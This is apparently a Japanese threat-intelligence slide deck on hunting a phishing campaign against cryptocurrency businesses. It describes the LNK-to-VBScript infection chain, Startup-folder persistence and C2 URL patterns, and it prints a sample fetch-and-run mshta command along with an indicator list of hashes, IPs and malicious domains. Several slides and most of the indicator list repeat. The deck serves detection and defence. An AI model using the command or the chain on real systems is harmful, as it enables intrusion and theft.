仮想通貨事業者を標的にした攻撃キャンペーンに関する脅威情報のハンティング
Contents
仮想通貨事業者を標的にした攻撃キャンペーンに関する
脅威情報のハンティング
株式会社インターネットイニシアティブ
小寺 建輝
Copyright Internet Initiative Japan Inc.
自己紹介
● 小寺 建輝(Tateki Kodera)
2019年度 株式会社インターネットイニシアティブ(IIJ) 新卒入社
SOC アナリスト
● 業務内容
インシデントの検知ルール作成
脅威情報の収集・分析
セキュリティブログ「wizSafe Security Signal」の執筆
Copyright Internet Initiative Japan Inc.
1
Introduction
●講演内容
仮想通貨事業者を標的とする対象の攻撃キャンペーンについて、
脅威情報を収集する方法(Hunting)の紹介
Huntingの結果・有効性の共有
●モチベーション
国内の事業者もこのキャンペーンの標的になっている
関連する脅威情報の流通量が少ない/遅い
侵害を早期発見・未然防ぐための情報が必要
Copyright Internet Initiative Japan Inc.
2
Agenda
●仮想通貨事業者を標的にした攻撃キャンペーンについて
●脅威情報の収集/Hunting
●まとめ
●Appendix
Copyright Internet Initiative Japan Inc.
3
仮想通貨事業者を標的にした攻撃キャンペーンについて
Copyright Internet Initiative Japan Inc.
仮想通貨事業者を標的にした攻撃キャンペーン
2019年7月にJPCERT/CCより公表[1]
その後各社が情報を公開[2][3]
● 攻撃者グループ名
CryptoCore
LeeryTurtle
Dangerous Password
CryptoMimic
Lazarus?
● ターゲット
仮想通貨事業者(日本企業も含む)
Copyright Internet Initiative Japan Inc.
[1] JP/CERT CC, 短縮URLからVBScriptをダウンロードさせるショートカットファイルを用いた攻撃, https://blogs.jpcert.or.jp/ja/2019/07/shorten_url_lnk.html, 2019-07
[2] ClearSky Cyber Security ltd., CryptoCore Group, https://www.clearskysec.com/cryptocore-group/, 2020-06
[3] F-Secure LABS, LAZARUS GROUP CAMPAIGN TARGETING THE CRYPTOCURRENCY VERTICAL,
https://www.f-secure.com/en/consulting/our-thinking/threat-intelligence-report-lazarus-group-targeting-cryptocurrency, 2020-08
5
攻撃キャンペーンの流れ(2020/03 時点)
1. スピアフィッシングメールを受信
2. リンクからZIPファイルをダウンロード
● ZIPファイルの中身
Decoyファイル(PDF、DOCXなど)
- パスワード保護されている
LNKファイル(ショートカットファイル)
- パスワードファイルや
ドキュメントファイルを装うことが多い
bit.ly
ZIP
Password
decoy
TXT
Drop&Open
LNK
Execute
C2 Server
VBS-1
Drop&Persistence
LNK
Drop&Execute
VBS-2
Execute
LNKファイルの例
Copyright Internet Initiative Japan Inc.
VBS-3
6
攻撃キャンペーンの流れ(2020/03 時点)
Decoyファイルの例
Copy&Paste?
Decoyファイルの例
日本暗号資産取引業協会, 「暗号資産取引業における主要な経理処理例示」公表のお知らせ,
https://jvcea.or.jp/news/main-info/20200612-001/ , 2020-06
Copyright Internet Initiative Japan Inc.
7
攻撃キャンペーンの流れ(2020/03 時点)
3. ZIPファイルに含まれるLNKファイルを
ユーザが実行
VBS-1をダウンロード・実行(mshta.exe)
URLの指定には短縮URL(bitly)を使用
bit.ly
ZIP
Password
decoy
LNK
● LNKファイルより実行されるコマンド例
C¥Windows¥system32¥mshta.exe https://bit.ly/<path>
TXT
Drop&Open
Execute
C2 Server
VBS-1
Drop&Persistence
LNK
Drop&Execute
VBS-2
VBS-1
VBS-1のダウンロード
Copyright Internet Initiative Japan Inc.
Execute
VBS-3
8
攻撃キャンペーンの流れ(2020/03 時点)
4. VBS-1の実行
bit.ly
ZIP
Decoyファイルのパスワード表示
- %TEMP%¥Password.txtを作成して表示
- 表示後はファイル削除
Password
永続化
- ユーザのStartupフォルダにLNKファイルを作成
- 最初のLNKファイルと通信先URLは異なる
- ファイル名:Xbox.lnk
VBS-2をドロップ・実行
- %TEMP%配下にVBSファイルを作成
- ファイル名:<英数字>.vbs
decoy
TXT
Drop&Open
LNK
Execute
C2 Server
VBS-1
Drop&Persistence
LNK
Drop&Execute
VBS-2
Execute
VBS-3
Copyright Internet Initiative Japan Inc.
9
攻撃キャンペーンの流れ(2020/03 時点)
5. VBS-2の実行
VBS-3のダウンロード・実行
- POSTリクエストを送信し、
レスポンスに含まれるVBS-3を実行
- URL:
bit.ly
ZIP
Password
decoy
LNK
http://<IP address>:8080/edit?topic=s9[0-9]{3}
TXT
Drop&Open
Execute
C2 Server
VBS-1
Drop&Persistence
LNK
Drop&Execute
VBS-2
VBS-3
VBS-3のダウンロード
Copyright Internet Initiative Japan Inc.
Execute
VBS-3
10
攻撃キャンペーンの流れ(2020/03 時点)
6. VBS-3の実行
bit.ly
ZIP
…
脅威情報のハンティング
株式会社インターネットイニシアティブ
小寺 建輝
Copyright Internet Initiative Japan Inc.
自己紹介
● 小寺 建輝(Tateki Kodera)
2019年度 株式会社インターネットイニシアティブ(IIJ) 新卒入社
SOC アナリスト
● 業務内容
インシデントの検知ルール作成
脅威情報の収集・分析
セキュリティブログ「wizSafe Security Signal」の執筆
Copyright Internet Initiative Japan Inc.
1
Introduction
●講演内容
仮想通貨事業者を標的とする対象の攻撃キャンペーンについて、
脅威情報を収集する方法(Hunting)の紹介
Huntingの結果・有効性の共有
●モチベーション
国内の事業者もこのキャンペーンの標的になっている
関連する脅威情報の流通量が少ない/遅い
侵害を早期発見・未然防ぐための情報が必要
Copyright Internet Initiative Japan Inc.
2
Agenda
●仮想通貨事業者を標的にした攻撃キャンペーンについて
●脅威情報の収集/Hunting
●まとめ
●Appendix
Copyright Internet Initiative Japan Inc.
3
仮想通貨事業者を標的にした攻撃キャンペーンについて
Copyright Internet Initiative Japan Inc.
仮想通貨事業者を標的にした攻撃キャンペーン
2019年7月にJPCERT/CCより公表[1]
その後各社が情報を公開[2][3]
● 攻撃者グループ名
CryptoCore
LeeryTurtle
Dangerous Password
CryptoMimic
Lazarus?
● ターゲット
仮想通貨事業者(日本企業も含む)
Copyright Internet Initiative Japan Inc.
[1] JP/CERT CC, 短縮URLからVBScriptをダウンロードさせるショートカットファイルを用いた攻撃, https://blogs.jpcert.or.jp/ja/2019/07/shorten_url_lnk.html, 2019-07
[2] ClearSky Cyber Security ltd., CryptoCore Group, https://www.clearskysec.com/cryptocore-group/, 2020-06
[3] F-Secure LABS, LAZARUS GROUP CAMPAIGN TARGETING THE CRYPTOCURRENCY VERTICAL,
https://www.f-secure.com/en/consulting/our-thinking/threat-intelligence-report-lazarus-group-targeting-cryptocurrency, 2020-08
5
攻撃キャンペーンの流れ(2020/03 時点)
1. スピアフィッシングメールを受信
2. リンクからZIPファイルをダウンロード
● ZIPファイルの中身
Decoyファイル(PDF、DOCXなど)
- パスワード保護されている
LNKファイル(ショートカットファイル)
- パスワードファイルや
ドキュメントファイルを装うことが多い
bit.ly
ZIP
Password
decoy
TXT
Drop&Open
LNK
Execute
C2 Server
VBS-1
Drop&Persistence
LNK
Drop&Execute
VBS-2
Execute
LNKファイルの例
Copyright Internet Initiative Japan Inc.
VBS-3
6
攻撃キャンペーンの流れ(2020/03 時点)
Decoyファイルの例
Copy&Paste?
Decoyファイルの例
日本暗号資産取引業協会, 「暗号資産取引業における主要な経理処理例示」公表のお知らせ,
https://jvcea.or.jp/news/main-info/20200612-001/ , 2020-06
Copyright Internet Initiative Japan Inc.
7
攻撃キャンペーンの流れ(2020/03 時点)
3. ZIPファイルに含まれるLNKファイルを
ユーザが実行
VBS-1をダウンロード・実行(mshta.exe)
URLの指定には短縮URL(bitly)を使用
bit.ly
ZIP
Password
decoy
LNK
● LNKファイルより実行されるコマンド例
C¥Windows¥system32¥mshta.exe https://bit.ly/<path>
TXT
Drop&Open
Execute
C2 Server
VBS-1
Drop&Persistence
LNK
Drop&Execute
VBS-2
VBS-1
VBS-1のダウンロード
Copyright Internet Initiative Japan Inc.
Execute
VBS-3
8
攻撃キャンペーンの流れ(2020/03 時点)
4. VBS-1の実行
bit.ly
ZIP
Decoyファイルのパスワード表示
- %TEMP%¥Password.txtを作成して表示
- 表示後はファイル削除
Password
永続化
- ユーザのStartupフォルダにLNKファイルを作成
- 最初のLNKファイルと通信先URLは異なる
- ファイル名:Xbox.lnk
VBS-2をドロップ・実行
- %TEMP%配下にVBSファイルを作成
- ファイル名:<英数字>.vbs
decoy
TXT
Drop&Open
LNK
Execute
C2 Server
VBS-1
Drop&Persistence
LNK
Drop&Execute
VBS-2
Execute
VBS-3
Copyright Internet Initiative Japan Inc.
9
攻撃キャンペーンの流れ(2020/03 時点)
5. VBS-2の実行
VBS-3のダウンロード・実行
- POSTリクエストを送信し、
レスポンスに含まれるVBS-3を実行
- URL:
bit.ly
ZIP
Password
decoy
LNK
http://<IP address>:8080/edit?topic=s9[0-9]{3}
TXT
Drop&Open
Execute
C2 Server
VBS-1
Drop&Persistence
LNK
Drop&Execute
VBS-2
VBS-3
VBS-3のダウンロード
Copyright Internet Initiative Japan Inc.
Execute
VBS-3
10
攻撃キャンペーンの流れ(2020/03 時点)
6. VBS-3の実行
bit.ly
ZIP
…
IoC
093eae51bd7566c40d646c1b37bce0ea
09bca3ddbc55f22577d2f3a7fda22d1c
0e03f39a4b4008d76e4ca1d1c2c4559d
0eb71e4d2978547bd96221548548e9f0
103.130.195.170
103.31.249.62
111.93.95.82
115c42f4a16aa6f52a4a431dcdd92941
124f4406e1f65d734f1f7430142f6f15
12aa32ee18926c597f3c0387f0775577
140.114.37.4
140.115.70.75
140.117.91.22
142.11.213.5
14a00f517012279af53118a491253e5c
192.119.84.22
206.169.149.96
224d2398437e665f3202d4118e4748e2
23.254.144.139
23fb6b8c4575375c7e98df04e82899c5
2a317378db1a743e2cea02fda71dab54
365d95c0d0659a1081488460eadf8159
41.79.70.142
41.85.145.164
42e570787aeba38db7b4fc7ae075685b
45.61.139.215
483d9238da27b35b9983ae6c062b3cd0
4a41775f08ac9dec54e67ee5ad6f8c21
53b800066811b7668e59774bd4c763ca
610043cefa364c56091d28058ea0392d
65686b08db5424db6be1520b9c1cb38c
75.133.9.84
76ec46ffc28bdd4337588fbe0e826b39
78.94.213.101
84.201.189.216
88.204.166.59
89.134.49.3
8cc8bdc017b103f4dbd00e6336809594
92aa224af7d71c9fc162fdb6ce53bc5b
97fd02ae666988d853a68fdd7f7d2e7f
a164164ef82fa17605c49c36c67a6244
a36b1884980301e22f70b2ddd4e5550b
af89869ad1ed31935ee6a15ab7a7cca9
bb14edf24bc21310f5af99fe7f31769f
bfd2bbfbd00f6164ad08d088a407240f
c025d1abf79cf25d753cdf97d549ab2b
cf1bc39380f40a514aa82e4db6215b11
d73499bc6b500b4fc5648943e12ce9e2
da599b0cde613b5512c13f299fec739e
dbbda35f115f382ad022cae0fd7d5157
e33cc1ebaf16d10a4d651868aa66fc87
eab491a31d4f049695c0aa515a0d90b6
f4d2b31353720527e1114aebfde0c6c9
ff9ee83f13bd8167d9ba780b2a147668
http://103.130.195.170
http://103.31.249.62
http://111.93.95.82
http://140.114.37.4
http://140.115.70.75
http://140.117.91.22
http://142.11.213.5
http://192.119.84.22
http://1driv.org
http://206.169.149.96
http://23.254.144.139
http://41.79.70.142
http://41.85.145.164
http://45.61.139.215
http://75.133.9.84
http://78.94.213.101
http://84.201.189.216
http://88.204.166.59
http://89.134.49.3
http://docs.dsharefile.tech
http://docs.gdriveshare.top
http://down.privatework.buzz
http://drop.trailads.net
http://mdown.showprice.xyz
http://mse.theworkpc.com
http://name.ownemail.me
http://share.onedrvfile.site
http://shop.newsbtctech.com
http://twosigmateam.info
http://up.digifincx.com
http://up.myemail.works
http://upload.gdrives.best
http://www.cloudfiles.club
http://www.filehost.network
http://www.gdocshare.com
http://www.google-clouds.com
09bca3ddbc55f22577d2f3a7fda22d1c
0e03f39a4b4008d76e4ca1d1c2c4559d
0eb71e4d2978547bd96221548548e9f0
103.130.195.170
103.31.249.62
111.93.95.82
115c42f4a16aa6f52a4a431dcdd92941
124f4406e1f65d734f1f7430142f6f15
12aa32ee18926c597f3c0387f0775577
140.114.37.4
140.115.70.75
140.117.91.22
142.11.213.5
14a00f517012279af53118a491253e5c
192.119.84.22
206.169.149.96
224d2398437e665f3202d4118e4748e2
23.254.144.139
23fb6b8c4575375c7e98df04e82899c5
2a317378db1a743e2cea02fda71dab54
365d95c0d0659a1081488460eadf8159
41.79.70.142
41.85.145.164
42e570787aeba38db7b4fc7ae075685b
45.61.139.215
483d9238da27b35b9983ae6c062b3cd0
4a41775f08ac9dec54e67ee5ad6f8c21
53b800066811b7668e59774bd4c763ca
610043cefa364c56091d28058ea0392d
65686b08db5424db6be1520b9c1cb38c
75.133.9.84
76ec46ffc28bdd4337588fbe0e826b39
78.94.213.101
84.201.189.216
88.204.166.59
89.134.49.3
8cc8bdc017b103f4dbd00e6336809594
92aa224af7d71c9fc162fdb6ce53bc5b
97fd02ae666988d853a68fdd7f7d2e7f
a164164ef82fa17605c49c36c67a6244
a36b1884980301e22f70b2ddd4e5550b
af89869ad1ed31935ee6a15ab7a7cca9
bb14edf24bc21310f5af99fe7f31769f
bfd2bbfbd00f6164ad08d088a407240f
c025d1abf79cf25d753cdf97d549ab2b
cf1bc39380f40a514aa82e4db6215b11
d73499bc6b500b4fc5648943e12ce9e2
da599b0cde613b5512c13f299fec739e
dbbda35f115f382ad022cae0fd7d5157
e33cc1ebaf16d10a4d651868aa66fc87
eab491a31d4f049695c0aa515a0d90b6
f4d2b31353720527e1114aebfde0c6c9
ff9ee83f13bd8167d9ba780b2a147668
http://103.130.195.170
http://103.31.249.62
http://111.93.95.82
http://140.114.37.4
http://140.115.70.75
http://140.117.91.22
http://142.11.213.5
http://192.119.84.22
http://1driv.org
http://206.169.149.96
http://23.254.144.139
http://41.79.70.142
http://41.85.145.164
http://45.61.139.215
http://75.133.9.84
http://78.94.213.101
http://84.201.189.216
http://88.204.166.59
http://89.134.49.3
http://docs.dsharefile.tech
http://docs.gdriveshare.top
http://down.privatework.buzz
http://drop.trailads.net
http://mdown.showprice.xyz
http://mse.theworkpc.com
http://name.ownemail.me
http://share.onedrvfile.site
http://shop.newsbtctech.com
http://twosigmateam.info
http://up.digifincx.com
http://up.myemail.works
http://upload.gdrives.best
http://www.cloudfiles.club
http://www.filehost.network
http://www.gdocshare.com
http://www.google-clouds.com